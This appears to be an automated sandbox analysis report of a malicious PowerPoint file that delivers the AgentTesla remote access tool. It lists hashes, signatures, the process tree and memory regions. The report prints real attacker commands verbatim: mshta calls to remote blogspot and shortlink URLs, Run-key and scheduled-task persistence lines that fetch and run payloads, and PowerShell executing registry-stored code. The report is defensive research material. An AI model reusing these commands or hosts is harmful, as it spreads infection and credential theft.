Resubmissions
25-02-2021 00:21
210225-efba8ycx12 10Analysis
-
max time kernel
86s -
max time network
147s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25-02-2021 00:21
Static task
static1
Behavioral task
behavioral1
Sample
DOC.ppt
Resource
win7v20201028
Behavioral task
behavioral2
Sample
DOC.ppt
Resource
win10v20201028
General
-
Target
DOC.ppt
-
Size
141KB
-
MD5
53f09cdb89620ee0d02c006d5bdf758f
-
SHA1
caf1ff6f5563d23eac7c547f2309c0608ae3029f
-
SHA256
a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca
-
SHA512
60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mSHtA.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2144 4716 mSHtA.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3984 4716 ping.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4752-60-0x0000000000400000-0x000000000043E000-memory.dmp family_agenttesla behavioral2/memory/4752-61-0x00000000004382DE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 9 IoCs
Processes:
mSHtA.exePowershell.exeflow pid process 35 2144 mSHtA.exe 37 2144 mSHtA.exe 39 2144 mSHtA.exe 41 2144 mSHtA.exe 43 2144 mSHtA.exe 45 2144 mSHtA.exe 49 2144 mSHtA.exe 50 2144 mSHtA.exe 55 2808 Powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mSHtA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")" mSHtA.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/266.html\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/266.html\"\", 0 : window.close\")" mSHtA.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 2808 set thread context of 4752 2808 Powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4708 2144 WerFault.exe mSHtA.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2728 taskkill.exe 3100 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 4716 POWERPNT.EXE 3252 winword.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
WerFault.exePowershell.exePowershell.exeaspnet_compiler.exepid process 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 2928 Powershell.exe 2808 Powershell.exe 2808 Powershell.exe 2928 Powershell.exe 2808 Powershell.exe 2928 Powershell.exe 2808 Powershell.exe 2808 Powershell.exe 4752 aspnet_compiler.exe 4752 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWerFault.exePowershell.exePowershell.exedescription pid process Token: SeDebugPrivilege 2728 taskkill.exe Token: SeDebugPrivilege 3100 taskkill.exe Token: SeDebugPrivilege 4708 WerFault.exe Token: SeDebugPrivilege 2928 Powershell.exe Token: SeDebugPrivilege 2808 Powershell.exe Token: SeIncreaseQuotaPrivilege 2808 Powershell.exe Token: SeSecurityPrivilege 2808 Powershell.exe Token: SeTakeOwnershipPrivilege 2808 Powershell.exe Token: SeLoadDriverPrivilege 2808 Powershell.exe Token: SeSystemProfilePrivilege 2808 Powershell.exe Token: SeSystemtimePrivilege 2808 Powershell.exe Token: SeProfSingleProcessPrivilege 2808 Powershell.exe Token: SeIncBasePriorityPrivilege 2808 Powershell.exe Token: SeCreatePagefilePrivilege 2808 Powershell.exe Token: SeBackupPrivilege 2808 Powershell.exe Token: SeRestorePrivilege 2808 Powershell.exe Token: SeShutdownPrivilege 2808 Powershell.exe Token: SeDebugPrivilege 2808 Powershell.exe Token: SeSystemEnvironmentPrivilege 2808 Powershell.exe Token: SeRemoteShutdownPrivilege 2808 Powershell.exe Token: SeUndockPrivilege 2808 Powershell.exe Token: SeManageVolumePrivilege 2808 Powershell.exe Token: 33 2808 Powershell.exe Token: 34 2808 Powershell.exe Token: 35 2808 Powershell.exe Token: 36 2808 Powershell.exe Token: SeIncreaseQuotaPrivilege 2928 Powershell.exe Token: SeSecurityPrivilege 2928 Powershell.exe Token: SeTakeOwnershipPrivilege 2928 Powershell.exe Token: SeLoadDriverPrivilege 2928 Powershell.exe Token: SeSystemProfilePrivilege 2928 Powershell.exe Token: SeSystemtimePrivilege 2928 Powershell.exe Token: SeProfSingleProcessPrivilege 2928 Powershell.exe Token: SeIncBasePriorityPrivilege 2928 Powershell.exe Token: SeCreatePagefilePrivilege 2928 Powershell.exe Token: SeBackupPrivilege 2928 Powershell.exe Token: SeRestorePrivilege 2928 Powershell.exe Token: SeShutdownPrivilege 2928 Powershell.exe Token: SeDebugPrivilege 2928 Powershell.exe Token: SeSystemEnvironmentPrivilege 2928 Powershell.exe Token: SeRemoteShutdownPrivilege 2928 Powershell.exe Token: SeUndockPrivilege 2928 Powershell.exe Token: SeManageVolumePrivilege 2928 Powershell.exe Token: 33 2928 Powershell.exe Token: 34 2928 Powershell.exe Token: 35 2928 Powershell.exe Token: 36 2928 Powershell.exe Token: SeIncreaseQuotaPrivilege 2928 Powershell.exe Token: SeSecurityPrivilege 2928 Powershell.exe Token: SeTakeOwnershipPrivilege 2928 Powershell.exe Token: SeLoadDriverPrivilege 2928 Powershell.exe Token: SeSystemProfilePrivilege 2928 Powershell.exe Token: SeSystemtimePrivilege 2928 Powershell.exe Token: SeProfSingleProcessPrivilege 2928 Powershell.exe Token: SeIncBasePriorityPrivilege 2928 Powershell.exe Token: SeCreatePagefilePrivilege 2928 Powershell.exe Token: SeBackupPrivilege 2928 Powershell.exe Token: SeRestorePrivilege 2928 Powershell.exe Token: SeShutdownPrivilege 2928 Powershell.exe Token: SeDebugPrivilege 2928 Powershell.exe Token: SeSystemEnvironmentPrivilege 2928 Powershell.exe Token: SeRemoteShutdownPrivilege 2928 Powershell.exe Token: SeUndockPrivilege 2928 Powershell.exe Token: SeManageVolumePrivilege 2928 Powershell.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 4716 POWERPNT.EXE 4716 POWERPNT.EXE 4716 POWERPNT.EXE 3252 winword.exe 3252 winword.exe 3252 winword.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
POWERPNT.EXEmSHtA.exePowershell.exedescription pid process target process PID 4716 wrote to memory of 2144 4716 POWERPNT.EXE mSHtA.exe PID 4716 wrote to memory of 2144 4716 POWERPNT.EXE mSHtA.exe PID 4716 wrote to memory of 3984 4716 POWERPNT.EXE ping.exe PID 4716 wrote to memory of 3984 4716 POWERPNT.EXE ping.exe PID 4716 wrote to memory of 3252 4716 POWERPNT.EXE winword.exe PID 4716 wrote to memory of 3252 4716 POWERPNT.EXE winword.exe PID 2144 wrote to memory of 2748 2144 mSHtA.exe schtasks.exe PID 2144 wrote to memory of 2748 2144 mSHtA.exe schtasks.exe PID 2144 wrote to memory of 2728 2144 mSHtA.exe taskkill.exe PID 2144 wrote to memory of 2728 2144 mSHtA.exe taskkill.exe PID 2144 wrote to memory of 2928 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 2928 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 2928 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 2808 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 2808 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 2808 2144 mSHtA.exe Powershell.exe PID 2144 wrote to memory of 3100 2144 mSHtA.exe taskkill.exe PID 2144 wrote to memory of 3100 2144 mSHtA.exe taskkill.exe PID 2808 wrote to memory of 4848 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4848 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4848 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe PID 2808 wrote to memory of 4752 2808 Powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DOC.ppt" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mSHtA.exemSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/266.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2144 -s 31163⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
memory/2144-7-0x0000000000000000-mapping.dmp
-
memory/2728-16-0x0000000000000000-mapping.dmp
-
memory/2748-15-0x0000000000000000-mapping.dmp
-
memory/2808-51-0x0000000009AF0000-0x0000000009AF1000-memory.dmpFilesize
4KB
-
memory/2808-20-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/2808-59-0x0000000007C40000-0x0000000007C53000-memory.dmpFilesize
76KB
-
memory/2808-58-0x00000000043B3000-0x00000000043B4000-memory.dmpFilesize
4KB
-
memory/2808-53-0x000000000A130000-0x000000000A131000-memory.dmpFilesize
4KB
-
memory/2808-45-0x0000000008D80000-0x0000000008D81000-memory.dmpFilesize
4KB
-
memory/2808-18-0x0000000000000000-mapping.dmp
-
memory/2808-44-0x00000000080A0000-0x00000000080A1000-memory.dmpFilesize
4KB
-
memory/2808-30-0x00000000043B2000-0x00000000043B3000-memory.dmpFilesize
4KB
-
memory/2808-28-0x00000000043B0000-0x00000000043B1000-memory.dmpFilesize
4KB
-
memory/2928-55-0x000000000A9D0000-0x000000000A9D1000-memory.dmpFilesize
4KB
-
memory/2928-35-0x0000000007360000-0x0000000007361000-memory.dmpFilesize
4KB
-
memory/2928-33-0x00000000072F0000-0x00000000072F1000-memory.dmpFilesize
4KB
-
memory/2928-23-0x0000000004500000-0x0000000004501000-memory.dmpFilesize
4KB
-
memory/2928-25-0x0000000006CC0000-0x0000000006CC1000-memory.dmpFilesize
4KB
-
memory/2928-27-0x0000000004630000-0x0000000004631000-memory.dmpFilesize
4KB
-
memory/2928-29-0x0000000004632000-0x0000000004633000-memory.dmpFilesize
4KB
-
memory/2928-37-0x00000000075B0000-0x00000000075B1000-memory.dmpFilesize
4KB
-
memory/2928-17-0x0000000000000000-mapping.dmp
-
memory/2928-31-0x0000000006AF0000-0x0000000006AF1000-memory.dmpFilesize
4KB
-
memory/2928-57-0x0000000009CD0000-0x0000000009CD1000-memory.dmpFilesize
4KB
-
memory/2928-49-0x0000000009600000-0x0000000009601000-memory.dmpFilesize
4KB
-
memory/2928-47-0x00000000098B0000-0x00000000098B1000-memory.dmpFilesize
4KB
-
memory/2928-40-0x0000000007960000-0x0000000007961000-memory.dmpFilesize
4KB
-
memory/2928-41-0x0000000007DF0000-0x0000000007DF1000-memory.dmpFilesize
4KB
-
memory/2928-21-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/3100-19-0x0000000000000000-mapping.dmp
-
memory/3252-9-0x0000000000000000-mapping.dmp
-
memory/3252-13-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmpFilesize
6.2MB
-
memory/3984-8-0x0000000000000000-mapping.dmp
-
memory/4708-22-0x000002566FD20000-0x000002566FD21000-memory.dmpFilesize
4KB
-
memory/4716-4-0x00007FF965210000-0x00007FF965220000-memory.dmpFilesize
64KB
-
memory/4716-6-0x00007FF965210000-0x00007FF965220000-memory.dmpFilesize
64KB
-
memory/4716-2-0x00007FF965210000-0x00007FF965220000-memory.dmpFilesize
64KB
-
memory/4716-5-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmpFilesize
6.2MB
-
memory/4716-3-0x00007FF965210000-0x00007FF965220000-memory.dmpFilesize
64KB
-
memory/4752-60-0x0000000000400000-0x000000000043E000-memory.dmpFilesize
248KB
-
memory/4752-61-0x00000000004382DE-mapping.dmp
-
memory/4752-62-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/4752-66-0x0000000005330000-0x0000000005331000-memory.dmpFilesize
4KB
-
memory/4752-68-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/4752-69-0x00000000057F0000-0x00000000057F1000-memory.dmpFilesize
4KB